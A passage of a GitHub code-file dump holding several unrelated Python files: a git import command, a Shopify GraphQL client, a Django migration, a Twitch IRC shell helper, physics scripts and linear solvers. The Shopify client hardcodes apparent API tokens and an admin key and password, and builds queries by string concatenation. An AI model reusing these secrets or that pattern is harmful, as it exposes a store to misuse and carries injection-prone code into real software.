len(prev_import_merge.parents) > 1:\n idx = next((idx for idx, commit in enumerate(prev_import_merge.parents)\n if commit.hexsha == strategy.searcher.commit.hexsha), None)\n\n if idx:\n additional_commits = prev_import_merge.parents[idx + 1:]\n if additional_commits and not args.branches:\n logger.warning(\"\"\"\\\n **************** WARNING ****************\n Previous import merged additional branches but non have\n been specified on the command line for this import.\\n\"\"\")\n\n if args.dry_run:\n commit_list = [c.hexsha[:6] + \" - \" + c.summary[:60] +\n (c.summary[60:] and \"...\")\n for c in list(strategy.filtered_iter())]\n logger.notice(\"\"\"\\\n Requested a dry-run: printing the list of commit that should be\n rebased\n\n %s\n \"\"\", \"\\n \".join(commit_list))\n return True\n\n logger.notice(\"Starting import of upstream\")\n import_upstream.create_import(force=args.force)\n logger.notice(\"Successfully created import branch\")\n\n if not import_upstream.apply(strategy, args.interactive):\n logger.notice(\"Import cancelled\")\n return False\n\n if not args.merge:\n logger.notice(\n \"\"\"\\\n Import complete, not merging to target branch '%s' as requested.\n \"\"\", args.branch)\n return True\n\n logger.notice(\"Merging import to requested branch '%s'\", args.branch)\n if import_upstream.finish():\n logger.notice(\n \"\"\"\\\n Successfully finished import:\n target branch: '%s'\n upstream branch: '%s'\n import branch: '%s'\"\"\", args.branch, args.upstream_branch,\n import_upstream.import_branch)\n if args.branches:\n for branch in args.branches:\n logger.notice(\" extra branch: '%s'\", branch, dedent=False)\n\n\n# vim:sw=4:sts=4:ts=4:et:\n","repo_name":"dguerri/git-upstream-old","sub_path":"git_upstream/commands/import.py","file_name":"import.py","file_ext":"py","file_size_in_byte":24719,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"72008624168","text":"import requests\n\nBASE_URL = 'https://axelteststore.myshopify.com'\n\n\nclass GraphQL:\n \"\"\"An interface for GraphQL endpoints.\"\"\"\n\n @staticmethod\n def request(query):\n \"\"\"Make a GraphQL request to the Shopify API.\n\n Args:\n query (str): The GraphQL request data.\n\n Returns:\n Response: The GraphQL response.\n \"\"\"\n return requests.post(\n BASE_URL + '/api/graphql',\n data=query,\n headers={\n 'Content-Type':\n 'application/graphql',\n 'X-Shopify-Storefront-Access-Token':\n '98b4b577fbc417686bc9354af95c735b'\n }).json()\n\n @staticmethod\n def get_products():\n \"\"\"Get all the products.\n\n Returns:\n Response: The GraphQL response.\n \"\"\"\n products = {}\n all_products = requests.get(\n BASE_URL + '/admin/products.json',\n auth=('e7759a3699a682d55e2c25991596e3cc',\n 'c586e1e6cf85d7a25e0df45ee8f66204')).json()\n for product in all_products[\"products\"]:\n products[product['handle']] = GraphQL.get_product(product['handle'])\n\n return products\n\n @staticmethod\n def get_product(product_name):\n \"\"\"Get a single product given a name.\n\n Args:\n product_name: (str): The name of the product.\n\n Returns:\n Response: The GraphQL response.\n \"\"\"\n query = '{shop {productByHandle(handle: \"' + product_name + '\") {id}}}'\n\n return GraphQL.request(query)\n\n @staticmethod\n def get_product_variants(product_name):\n \"\"\"Get the variants for a given product.\n\n Args:\n product_name: (str): The name of the product.\n\n Returns:\n Response: The GraphQL response.\n \"\"\"\n query = '{ shop { productByHandle(handle: \"' + product_name + '\")\\\n { variants(first:3) { edges { node { id }}}}}}'\n\n return GraphQL.request(query)\n\n @staticmethod\n def build_line_items(variants):\n \"\"\"Build the line items object for the product variants.\n\n Args:\n variants: (str): The variants of the product.\n\n Returns:\n str: The line items GraphQL string.\n \"\"\"\n variants = variants['data']['shop']['productByHandle']['variants'][\n 'edges']\n line_items = \"[\"\n for variant in variants:\n line_items += '{ variantId: \"' + variant['node']['id'] + '\", quantity: 1 }'\n\n return str(line_items + ']')\n\n @staticmethod\n def create_checkout(product_name):\n \"\"\"Crearte a checkout URL with the product added to the cart.\n\n Args:\n product_name: (str): The name of the product.\n\n Returns:\n str: The checkout URL.\n \"\"\"\n variants = GraphQL.get_product_variants(product_name)\n line_items = GraphQL.build_line_items(variants)\n query = (\n 'mutation {checkoutCreate(input: {lineItems: ' + line_items +\n '}){checkout {id webUrl lineItems(first: 5) {edges {node {title quantity}}}}}}'\n )\n request = GraphQL.request(query)\n checkout = request['data']['checkoutCreate']['checkout']['webUrl']\n\n return checkout\n","repo_name":"axelthorstein/object","sub_path":"object/graphql.py","file_name":"graphql.py","file_ext":"py","file_size_in_byte":3280,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15911335246","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('weapon', '0001_initial'),\n ('card', '0007_auto_20151014_1310'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='cardeptitude',\n name='weapon',\n field=models.ForeignKey(to='weapon.Weapon', blank=True, null=True),\n preserve_default=True,\n ),\n ]\n","repo_name":"officefish/la_server","sub_path":"card/migrations/0008_cardeptitude_weapon.py","file_name":"0008_cardeptitude_weapon.py","file_ext":"py","file_size_in_byte":503,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34325797428","text":"import select\nimport typing\n\nimport twitchirc\n\n\ndef create_msg(text, channel) -> twitchirc.ChannelMessage:\n \"\"\"\n Create a ChannelMessage with the provided text and channel.\n\n :return: Newly created ChannelMessage object.\n \"\"\"\n msg = twitchirc.ChannelMessage(text=text, channel=channel, user='OUTGOING')\n msg.outgoing = True\n return msg\n\n\ndef connect(oauth_token, use_ssl=True) -> twitchirc.Connection:\n \"\"\"\n Connect to IRC.\n\n :param oauth_token: Authentication token. You can get one at https://twitchapps.com/tmi/\n The username is not needed for connecting.\n :param use_ssl: You can enable or disable encryption here.\n :return: created connection.\n \"\"\"\n conn = twitchirc.Connection('irc.chat.twitch.tv', port=6697 if use_ssl else 6667, secure=use_ssl)\n conn.connect('don_t_need_to_know_this', oauth_token)\n return conn\n\n\ndef connect_anon(use_ssl=True) -> twitchirc.Connection:\n \"\"\"\n Connect to IRC.\n\n :param use_ssl: You can enable or disable encryption here.\n :return: created connection.\n \"\"\"\n conn = twitchirc.Connection('irc.chat.twitch.tv', port=6697 if use_ssl else 6667, secure=use_ssl)\n conn.connect('justinfan1234', 'junstinfan1234')\n return conn\n\n\ndef recv(conn: twitchirc.Connection) -> typing.List[twitchirc.Message]:\n msgs = []\n while 1:\n ready, _, _ = select.select([conn.socket], [], [], 0)\n ready = bool(ready)\n if ready:\n conn.receive()\n m = conn.process_messages()\n if not m:\n break\n print(m)\n msgs.extend(m)\n\n return msgs\n\n\nprint(f'twitchirc shell shortcuts loaded. There are shortcuts here for making experimenting easier.')\nprint(' - create_msg(text: str, channel: str) -> Message \\n'\n ' Creates a ChannelMessage with the provided text and channel, useful for sending test messages.')\nprint(' - connect(oauth_token: str, use_ssl=True) -> Connection\\n'\n ' Connect.')\nprint(' - connect_anon(use_ssl=True) -> Connection\\n'\n ' Connect anonymously.')\nprint(' - recv(conn: Connection) -> List[Message]\\n'\n ' Receive and process all the messages waiting.')\nif __name__ == '__main__':\n try:\n import IPython\n\n IPython.start_ipython()\n except ImportError:\n import code\n\n code.interact(local=globals())\n","repo_name":"Mm2PL/twitchirc","sub_path":"twitchirc/twitchirc/shell.py","file_name":"shell.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12029807815","text":"import subprocess\nfrom subprocess import PIPE\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport csv\n\ngrains = 20\nsupport = 6\npopulation_num = 1e3\nk = 2\nl = 6\nepsilon = 1e-100 \ndisorder_start = 20\ndisorder_end = 30\naverage_type = \"mean\"\nstart_wait = int(2e3)\nnum_iterations = int(1e3)\nenergy = 0\n\ndisorder_vec = np.linspace(disorder_start,disorder_end,grains)\ntime_aver_vec = np.array([])\nprint(\"L = {}, K = {}\".format(l,k))\nfor disorder in disorder_vec:\n x = subprocess.run(\"~/anderson/husimi/time_aver.exe {} {} {} {} {} {} {} {} {} {}\".format(grains, support, population_num, k, l, epsilon, disorder, num_iterations, energy, start_wait),shell=True,stdout=PIPE).stdout.decode(\"utf-8\").split(\",\")[:-1]\n res_vec = np.array([float(i) for i in x])\n time_aver_vec = np.append(time_aver_vec, np.average(res_vec))\n print(\"Disorder = {}\".format(disorder))\n\nplt.plot(disorder_vec, time_aver_vec)\nplt.title(\"Time average after {} iterations over {} iterations against disorder for husimi L{},K{}\".format(start_wait, num_iterations,l,k))\nplt.xlabel(\"Disorder\")\nplt.ylabel(\"Time averaged mean imaginary part of resolvent\")\nplt.yscale('log')\nplt.savefig('time_aver_{}_P{}_L{}_K{}.png'.format(average_type, population_num, l, k), bbox_inches='tight')\n\nsubprocess.run(\"gsutil mv time_aver_{}_P{}_L{}_K{}.png gs://anderson_loc/husimi/mob_edge/\".format(average_type, population_num, l, k),shell=True)\n","repo_name":"Snillocada/anderson","sub_path":"husimi/mobtest.py","file_name":"mobtest.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20155369765","text":"import cobdh\nimport cobdh.xmlx.parser\n\nNS = {\n 'tei': 'http://www.tei-c.org/ns/1.0',\n}\nXMLID = '{http://www.w3.org/XML/1998/namespace}id'\n\n\ndef bibl_id(path):\n \"\"\"\\\n >>> import tests.resources\n >>> bibl_id(tests.resources.BIBL_1_PATH) # adjust test after changing data collection\n 'BVCP1990'\n >>> bibl_id(tests.resources.BIBL_10_PATH)\n 'Hovhanessian2013'\n \"\"\"\n content = cobdh.file_read(path)\n data = cobdh.xmlx.parser.parse(content)\n parsed = data.find('.//tei:biblFull', namespaces=NS)\n if not parsed:\n # backup parser\n parsed = data.find('.//tei:biblStruct', namespaces=NS)\n value = parsed.get(XMLID)\n return value\n\n\ndef persons_id(path):\n \"\"\"\\\n >>> import tests.resources\n >>> persons_id(tests.resources.PERSONS_2_PATH) # adjust test after changing data collection\n 'HovhanessianVahan'\n \"\"\"\n content = cobdh.file_read(path)\n data = cobdh.xmlx.parser.parse(content)\n parsed = data.find('.//tei:person', namespaces=NS)\n value = parsed.get(XMLID)\n return value\n","repo_name":"cobdh/app","sub_path":"tests/resources/parser.py","file_name":"parser.py","file_ext":"py","file_size_in_byte":1050,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42854638758","text":"import numpy as np\nimport math\nfrom numpy import linalg as la\nfrom numba import njit\n\ndef Hr_3D(j,mi_0,imas,dom): # Campo H na direção X para 1 ímã\n CTE = j/(4*np.pi*mi_0)\n Sum_x = 0.0\n Sum_y = 0.0\n Sum_z = 0.0\n L_x = dom[0][0]\n L_y = dom[0][1]\n L_z = dom[0][2]\n n_x = int(dom[1][0])\n n_y = int(dom[1][1])\n n_z = int(dom[1][2])\n delta_x = L_x/(n_x-1)\n delta_y = L_y/(n_y-1)\n delta_z = L_z/(n_z-1)\n x_0 = - delta_x\n y_0 = - delta_y\n z_0 = - delta_z\n\n H = []\n for i in range(n_z):\n z_0 = z_0 + delta_z\n for j in range(n_y):\n y_0 = y_0 + delta_y\n for k in range(n_x):\n x_0 = x_0 + delta_x\n for l in range(len(imas)):\n a = imas[l][0]\n b = imas[l][1]\n c = imas[l][2]\n x = -imas[l][3] + x_0\n y = -imas[l][4] + y_0\n z = -imas[l][5] + z_0\n H_x = CTE*np.log(((y+b+np.sqrt((y+b)**2+(x-a)**2+z**2))/\\\n (y-b+np.sqrt((y-b)**2+(x-a)**2+z**2)))\\\n *((y-b+np.sqrt((y-b)**2+(x+a)**2+z**2))\\\n /(y+b+np.sqrt((y+b)**2+(x+a)**2+z**2))))\\\n -CTE*np.log(((y+b+np.sqrt((y+b)**2+(x-a)**2+(z+c)**2))/\\\n (y-b+np.sqrt((y-b)**2+(x-a)**2+(z+c)**2)))\\\n *((y-b+np.sqrt((y-b)**2+(x+a)**2+(z+c)**2))\\\n /(y+b+np.sqrt((y+b)**2+(x+a)**2+(z+c)**2))))\n \n H_y = CTE*np.log(((x+a+np.sqrt((y-b)**2+(x+a)**2+z**2))/\\\n (x-a+np.sqrt((y-b)**2+(x-a)**2+z**2)))\\\n *((x-a+np.sqrt((y+b)**2+(x-a)**2+z**2))\\\n /(x+a+np.sqrt((y+b)**2+(x+a)**2+z**2))))\\\n -CTE*np.log(((x+a+np.sqrt((y-b)**2+(x+a)**2+(z+c)**2))/\\\n (x-a+np.sqrt((y-b)**2+(x-a)**2+(z+c)**2)))\\\n *((x-a+np.sqrt((y+b)**2+(x-a)**2+(z+c)**2))\\\n /(x+a+np.sqrt((y+b)**2+(x+a)**2+(z+c)**2))))\n \n H_z = CTE*(np.arctan(((x+a)*(y+b))/(z*np.sqrt((x+a)**2+(y+b)**2+z**2)))\\\n +np.arctan(((x-a)*(y-b))/(z*np.sqrt((x-a)**2+(y-b)**2+z**2)))\\\n -np.arctan(((x+a)*(y-b))/(z*np.sqrt((x+a)**2+(y-b)**2+z**2)))\\\n -np.arctan(((x-a)*(y+b))/(z*np.sqrt((x-a)**2+(y+b)**2+z**2))))\\\n -CTE*(np.arctan(((x+a)*(y+b))/((z+c)*np.sqrt((x+a)**2+(y+b)**2+(z+c)**2)))\\\n +np.arctan(((x-a)*(y-b))/((z+c)*np.sqrt((x-a)**2+(y-b)**2+(z+c)**2)))\\\n -np.arctan(((x+a)*(y-b))/((z+c)*np.sqrt((x+a)**2+(y-b)**2+(z+c)**2)))\\\n -np.arctan(((x-a)*(y+b))/((z+c)*np.sqrt((x-a)**2+(y+b)**2+(z+c)**2))))\n \n Sum_x = Sum_x + H_x\n Sum_y = Sum_y + H_y\n Sum_z = Sum_z + H_z \n res = ((Sum_x)**2+(Sum_y)**2+(Sum_z)**2)**(0.5)\n Sum = np.array(([res,Sum_x,Sum_y,Sum_z,x_0,y_0,z_0]))\n H.append(Sum)\n Sum_x = 0.0\n Sum_y = 0.0\n Sum_z = 0.0 \n x_0 = 0.0\n y_0 = 0.0\n\n return H\n\ndef Hr_1D(j,mi_0,imas,dom): # Campo H na direção X para 1 ímã\n CTE = j/(4*np.pi*mi_0)\n Sum_x = 0.0\n Sum_y = 0.0\n Sum_z = 0.0\n L_z = dom[0][2]\n n_z = int(dom[1][2])\n delta_z = L_z/(n_z-1)\n z_0 = - delta_z\n\n H = []\n for i in range(n_z):\n z_0 = z_0 + delta_z\n for l in range(len(imas)):\n a = imas[l][0]\n b = imas[l][1]\n c = imas[l][2]\n x = -imas[0][3] \n y = -imas[0][4] \n z = -imas[l][5] + z_0\n H_x = CTE*np.log(((y+b+np.sqrt((y+b)**2+(x-a)**2+z**2))/\\\n (y-b+np.sqrt((y-b)**2+(x-a)**2+z**2)))\\\n *((y-b+np.sqrt((y-b)**2+(x+a)**2+z**2))\\\n /(y+b+np.sqrt((y+b)**2+(x+a)**2+z**2))))\\\n -CTE*np.log(((y+b+np.sqrt((y+b)**2+(x-a)**2+(z+c)**2))/\\\n (y-b+np.sqrt((y-b)**2+(x-a)**2+(z+c)**2)))\\\n *((y-b+np.sqrt((y-b)**2+(x+a)**2+(z+c)**2))\\\n /(y+b+np.sqrt((y+b)**2+(x+a)**2+(z+c)**2))))\n \n H_y = CTE*np.log(((x+a+np.sqrt((y-b)**2+(x+a)**2+z**2))/\\\n (x-a+np.sqrt((y-b)**2+(x-a)**2+z**2)))\\\n *((x-a+np.sqrt((y+b)**2+(x-a)**2+z**2))\\\n /(x+a+np.sqrt((y+b)**2+(x+a)**2+z**2))))\\\n -CTE*np.log(((x+a+np.sqrt((y-b)**2+(x+a)**2+(z+c)**2))/\\\n (x-a+np.sqrt((y-b)**2+(x-a)**2+(z+c)**2)))\\\n *((x-a+np.sqrt((y+b)**2+(x-a)**2+(z+c)**2))\\\n /(x+a+np.sqrt((y+b)**2+(x+a)**2+(z+c)**2))))\n \n H_z = CTE*(np.arctan(((x+a)*(y+b))/(z*np.sqrt((x+a)**2+(y+b)**2+z**2)))\\\n +np.arctan(((x-a)*(y-b))/(z*np.sqrt((x-a)**2+(y-b)**2+z**2)))\\\n -np.arctan(((x+a)*(y-b))/(z*np.sqrt((x+a)**2+(y-b)**2+z**2)))\\\n -np.arctan(((x-a)*(y+b))/(z*np.sqrt((x-a)**2+(y+b)**2+z**2))))\\\n -CTE*(np.arctan(((x+a)*(y+b))/((z+c)*np.sqrt((x+a)**2+(y+b)**2+(z+c)**2)))\\\n +np.arctan(((x-a)*(y-b))/((z+c)*np.sqrt((x-a)**2+(y-b)**2+(z+c)**2)))\\\n -np.arctan(((x+a)*(y-b))/((z+c)*np.sqrt((x+a)**2+(y-b)**2+(z+c)**2)))\\\n -np.arctan(((x-a)*(y+b))/((z+c)*np.sqrt((x-a)**2+(y+b)**2+(z+c)**2))))\n \n Sum_x = Sum_x + H_x\n Sum_y = Sum_y + H_y\n Sum_z = Sum_z + H_z \n res = ((Sum_x)**2+(Sum_y)**2+(Sum_z)**2)**(0.5)\n Sum = np.array(([res,Sum_x,Sum_y,Sum_z,x,y,z_0]))\n H.append(Sum)\n Sum_x = 0.0\n Sum_y = 0.0\n Sum_z = 0.0 \n\n\n return H\n\ndef temp_1d(t1,t2,pf,x,n,l_x):\n t = np.zeros(n)\n for i in range(n):\n if pf==1:\n t[i] = t1 +((t2-t1)/l_x)*x[i]\n if pf==2 and t2 == 400:\n t[i] = t1 + (3012*x[i]) -(2594*(x[i]**2)) + (873961*(x[i]**3)) -(1.43e+07*(x[i]**4))\n if pf==2 and t2 == 500:\n t[i] = t1 + (6093*x[i]) -(21730*(x[i]**2)) + (2.43e+06*(x[i]**3)) -(3.53e+07*(x[i]**4))\n if pf==2 and t2 == 600:\n t[i] = t1 + (9139*x[i]) + (68068*(x[i]**2)) -(1.14e+07*(x[i]**3)) + (7.31e+08*(x[i]**4)) - (1.72e+10*(x[i]**5)) + (1.34e+11*(x[i]**6))\n if pf==2 and t2 == 700:\n t[i] = t1 + (12658*x[i]) + (158808*(x[i]**2)) -(2.99e+07*(x[i]**3)) + (1.76e+09*(x[i]**4)) - (3.94e+10*(x[i]**5)) + (2.97e+11*(x[i]**6))\n if pf==2 and t2 == 800:\n t[i] = t1 + (16362*x[i]) + (277523*(x[i]**2)) -(5.46e+07*(x[i]**3)) + (3.13e+09*(x[i]**4)) - (6.9e+10*(x[i]**5)) + (5.14e+11*(x[i]**6))\n if pf==2 and t2 == 900:\n t[i] = t1 + (20211*x[i]) + (404420*(x[i]**2)) -(8.26e+07*(x[i]**3)) + (4.7e+09*(x[i]**4)) - (1.03e+11*(x[i]**5)) + (7.67e+11*(x[i]**6))\n if pf==2 and t2 == 1000:\n t[i] = t1 + (25067*x[i]) + (95744*(x[i]**2)) -(2.5e+07*(x[i]**3)) -(2.49e+09*(x[i]**4)) + (3.54e+11*(x[i]**5)) -(1.41e+13*(x[i]**6)) + (2.38e+14*(x[i]**7)) -(1.45e+15*(x[i]**8))\n if pf==2 and t2 == 1100:\n t[i] = t1 + (29276*x[i]) + (127388*(x[i]**2)) -(3.69e+07*(x[i]**3)) -(2.63e+09*(x[i]**4)) + (4.21e+11*(x[i]**5)) -(1.7e+13*(x[i]**6)) + (2.86e+14*(x[i]**7)) -(1.73e+15*(x[i]**8))\n if pf==2 and t2 == 1200:\n t[i] = t1 + (33522*x[i]) + (161617*(x[i]**2)) -(5.06e+07*(x[i]**3)) -(2.61e+09*(x[i]**4)) + (4.81e+11*(x[i]**5)) -(1.98e+13*(x[i]**6)) + (3.33e+14*(x[i]**7)) -(2.00e+15*(x[i]**8))\n if pf==2 and t2 == 1300:\n t[i] = t1 + (37796*x[i]) + (199682*(x[i]**2)) -(6.62e+07*(x[i]**3)) -(2.38e+09*(x[i]**4)) + (5.3e+11*(x[i]**5)) -(2.23e+13*(x[i]**6)) + (3.76e+14*(x[i]**7)) -(2.24e+15*(x[i]**8))\n \n return t\n\ndef xi_1d(t,n,md,mi0,v,phi_p,kb):\n xi = np.zeros(n)\n cte = (mi0*(md**2)*phi_p*v)/(3*kb)\n for i in range(n):\n xi[i] = cte/t[i]\n\n return xi\n\n\ndef Gauss(A, b):\n \"\"\"\n Gaussian Elimination with Backward Substitution\n \"\"\"\n lines, columns = A.shape\n n = lines\n\n M = np.zeros((n, n + 1))\n M[:, :-1] = A\n M[:, -1] = b\n\n x = np.zeros(n)\n for i in range(n - 1):\n p = i\n while p < n - 1 and M[p][i] == 0:\n p += 1\n if p != i:\n M[i], M[p] = M[p], M[i] # swap lines\n if p == n - 1:\n # print(\"Solution doesn't exist - 1\")\n return None\n for j in range(i + 1, n):\n m = M[j][i] / M[i][i]\n M[j] = M[j] - m * M[i]\n # print(M)\n if M[n - 1][n - 1] == 0:\n # print(\"Solution doesn't exist - 2\")\n return None\n x[-1] = M[-1][-1] / M[-1][-2]\n for i in range(n - 2, -1, -1):\n soma = 0\n for j in range(i + 1, n):\n soma += M[i][j] * x[j]\n x[i] = (M[i][-1] - soma) / M[i][i]\n return x\n\ndef Partial(A, b):\n \"\"\"\n Gaussian Elimination with Partial Pivoting\n \"\"\"\n lines, columns = A.shape\n n = lines\n\n M = np.zeros((n, n + 1))\n M[:, :-1] = A\n M[:, -1] = b\n\n x = np.zeros(n)\n nrow = np.zeros(n, dtype=type(int))\n for i in range(n):\n nrow[i] = i\n for i in range(n - 1):\n maxim = 0\n p = i\n for j in range(i, n):\n if np.abs(M[nrow[j]][i]) > maxim:\n maxim = np.abs(M[nrow[j]][i])\n p = j\n if M[nrow[p]][i] == 0:\n # print(\"Solution doesn't exist - 1\")\n return None\n if nrow[i] != nrow[p]:\n nrow[i], nrow[p] = nrow[p], nrow[i] # M troca de linhas\n for j in range(i + 1, n):\n m = M[nrow[j]][i] / M[nrow[i]][i]\n M[nrow[j]] = M[nrow[j]] - m * M[nrow[i]]\n # print(M)\n if M[nrow[-1]][n] == 0:\n # print(\"Solution doesn't exist - 2\")\n return None\n x[-1] = M[nrow[-1]][-1] / M[nrow[-1]][-2]\n for i in range(n - 2, -1, -1):\n soma = 0\n for j in range(i + 1, n):\n soma += M[nrow[i]][j] * x[j]\n x[i] = (M[nrow[i]][-1] - soma) / M[nrow[i]][i]\n return x\n\n\ndef Scaled(A, b):\n \"\"\"\n Gaussian Elimination with Scaled Partial Pivoting\n \"\"\"\n lines, columns = A.shape\n n = lines\n\n M = np.zeros((n, n + 1))\n M[:, :-1] = A\n M[:, -1] = b\n\n x = np.zeros(n)\n nrow = np.zeros(n, dtype=type(int))\n\n # Only this difference between this algorithm and the precedent\n s = np.zeros(n)\n for i in range(n):\n for j in range(n):\n if s[i] < np.abs(M[i][j]):\n s[i] = np.abs(M[i][j])\n if s[i] == 0:\n return None\n # Until here\n\n for i in range(n):\n nrow[i] = i\n for i in range(n - 1):\n maximo = 0\n p = i\n for j in range(i, n):\n if np.abs(M[nrow[j]][i]) / s[nrow[j]] > maximo: # Alteracao desse\n maximo = np.abs(M[nrow[j]][i]) / s[nrow[j]] # E desse\n p = j\n\n if M[nrow[p]][i] == 0:\n # print(\"Solution doesn't exist - 1\")\n return None\n if nrow[i] != nrow[p]:\n nrow[i], nrow[p] = nrow[p], nrow[i] # M troca de linhas\n for j in range(i + 1, n):\n m = M[nrow[j]][i] / M[nrow[i]][i]\n M[nrow[j]] = M[nrow[j]] - m * M[nrow[i]]\n # print(M)\n if M[nrow[-1]][n] == 0:\n # print(\"Solution doesn't exist - 2\")\n return None\n x[-1] = M[nrow[-1]][-1] / M[nrow[-1]][-2]\n for i in range(n - 2, -1, -1):\n soma = 0\n for j in range(i + 1, n):\n soma += M[nrow[i]][j] * x[j]\n x[i] = (M[nrow[i]][-1] - soma) / M[nrow[i]][i]\n return x\n\n\ndef LUFactorization(A):\n \"\"\"\n LU Factorization\n This algorithm is good if you have always the same matrix A, and with different configurations of b.\n \"\"\"\n lines, columns = A.shape\n n = lines\n\n L = np.zeros((n, n))\n U = np.zeros((n, n))\n\n if A[0, 0] == 0:\n # Impossible factorization\n return None, None\n L[0, 0] = A[0, 0]\n\n U[0] = A[0] / L[0, 0]\n L[:, 0] = A[:, 0] / U[0, 0]\n\n for i in range(1, n - 1):\n soma = 0\n for k in range(i):\n soma += L[i, k] * U[k, i]\n L[i, i] = A[i, i] - soma\n U[i, i] = 1\n if L[i, i] == 0:\n # Impossible factorization\n return None, None\n\n for j in range(i + 1, n):\n soma = 0\n for k in range(i):\n soma += L[i, k] * U[k, j]\n U[i, j] = (A[i, j] - soma) / L[i, i]\n soma = 0\n for k in range(i):\n soma += L[j, k] * U[k, i]\n L[j, i] = (A[j, i] - soma) / U[i, i]\n soma = 0\n for k in range(n - 1):\n soma += L[-1, k] * U[k, -1]\n L[-1, -1] = (A[-1, -1] - soma)\n U[-1, -1] = 1\n if L[-1, -1] == 0:\n # Impossible, matrix A is singular\n return None, None\n return L, U\n\ndef solvewithLU(L, U, b):\n\n # Now that A * x = b\n # and A = L * U\n # So, L*U*x = b is equal to\n # L*y = b\n # U*x = y\n # So, we find frist y and after that x\n # Now, it's solve using\n if L is None: # If it couldn't decompose A in LU method\n return None\n n = len(b)\n y = np.zeros(n)\n x = np.zeros(n)\n\n y[0] = b[0] / L[0, 0]\n for i in range(1, n):\n soma = 0\n for j in range(i):\n soma += L[i, j] * y[j]\n y[i] = (b[i] - soma) / L[i, i]\n\n x[-1] = y[-1] / U[-1, -1]\n for i in range(n - 1, -1, -1):\n soma = 0\n for j in range(i + 1, n):\n soma += U[i, j] * x[j]\n x[i] = (y[i] - soma) / U[i, i]\n\n return x\n\ndef gauss_seidel(A: np.ndarray, b: np.ndarray, tol=1e-3, max_iter=1e4):\n \n \"\"\"Gauss Seidel Method for solving linear systems of equations.\n\n Raises:\n ValueError: A is not diagonally dominant\n ValueError: A is not a square matrix\n ValueError: A and b are not the same size\n \n Args:\n A (np.ndarray): Coefficient matrix\n b (np.ndarray): Vector of constants\n tol (float, optional): Tolerance. Defaults to 1e-10.\n max_iter (int, optional): Maximum number of iterations. Defaults to 1e4.\n \"\"\"\n \n for i in range(len(b)):\n \n if A[i][i] == 0:\n raise ValueError(\"A is not diagonally dominant\")\n \n elif len(A) != len(A[0]):\n raise ValueError(\"A is not a square matrix\")\n \n elif len(A) != len(b):\n raise ValueError(\"A and b are not the same size\")\n \n N = len(b)\n x = np.zeros(N, float)\n R = np.zeros(N, float)\n \n iteration = 0\n x, R = gauss_seidel_main_loo(A, b, x, R, N, tol, max_iter)\n return([x, R])\n\n@njit(fastmath=True)\ndef gauss_seidel_main_loo(A, b, x, R, N, tol=1e-3, max_iter=1e4, iteration=0):\n while True and iteration < max_iter:\n for i in range(N):\n sumation = 0.\n \n for j in range(N):\n sumation += A[i,j] * x[j]\n \n R[i] = (1.0/A[i,i]) * (b[i] - sumation)\n \n x[i] += R[i]\n \n print(np.max(np.abs(R)), iteration)\n if np.max(np.abs(R)) < tol:\n break\n \n iteration += 1\n return([x, R])\n\n\n\n\n\n\n\n\n\n","repo_name":"roberto040100/Potencial-Magn-tico","sub_path":"func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":14710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17214312004","text":"\"\"\"\ntop down dp\n\nO(m * n * L) where L is the average length of words in strs\n\"\"\"\nclass Solution:\n def findMaxForm(self, strs: List[str], m: int, n: int) -> int:\n dp = [[0] * (n + 1) for _ in range(m + 1)]\n\n for st in strs:\n numOne, numZero = st.count('0'), st.count('1')\n\n for i in range(m, numOne - 1, -1):\n for j in range(n, numZero - 1, -1):\n dp[i][j] = max(dp[i][j], dp[i - numOne][j - numZero] + 1)\n return dp[m][n]","repo_name":"yunkaiwang/LeetCodeSol","sub_path":"algorithms/dynamic_programming/474_OnesAndZeros.py","file_name":"474_OnesAndZeros.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19169476591","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\n\nimport numpy as np\nimport random\nimport time\nimport os\nimport argparse\n\nfrom utils import models2 as models\nfrom sys import stdout\nfrom IPython import embed\nfrom sklearn.model_selection import train_test_split\nfrom xgboost.sklearn import XGBClassifier\nimport pickle\nimport sys\n\ndevice = \"cuda\" if torch.cuda.is_available else \"cpu\"\n\nclass main():\n def __init__(self, args):\n # args\n self.epochs = args.epochs\n self.batch_size = args.batch_size\n self.lr = args.lr_rate\n self.path = args.data_path\n self.print_iter = args.print_iter\n self.save_iter = args.save_iter\n self.model_dump = args.model_dump\n\n # init\n self.loss_epoch_tr = []\n self.acc_epoch_tr = []\n self.loss_epoch_va = []\n self.acc_epoch_va = []\n\n\n def load_data(self):\n print(\"Load prepro-data...\")\n Trans = []\n\n train_data_list = [\n \"Type1-GAM-training.npy\",\n \"Type2-GAM-training.npy\",\n \"Type3-GAM-training.npy\",\n \"Type4-GAM-training.npy\",\n \"Type5-GAM-training.npy\"]\n\n train_x, valid_x = [], []\n train_y, valid_y = [], []\n a = {0:[],1:[],2:[],3:[],4:[]}\n for idx, file in enumerate(train_data_list):\n data = np.load(os.path.join(self.path, file))\n # assert np.array([ np.isnan(i).astype(int).sum()!=0 for i in data.tolist()]).astype(int).sum() == 0\n data_tr, data_va = train_test_split(data.tolist(), test_size=0.2, random_state=1126)\n\n print(\"\\tThere are {} ({}+{}) log files in {} data with label {}.\".format(len(data_tr)+len(data_va), len(data_tr), len(data_va), file, idx))\n tmp_x = []\n\n for file in data_tr:\n for row in file:\n flat_row = row.reshape(-1)\n tmp_x.append(flat_row)\n\n if idx == 4:\n tmp_x = 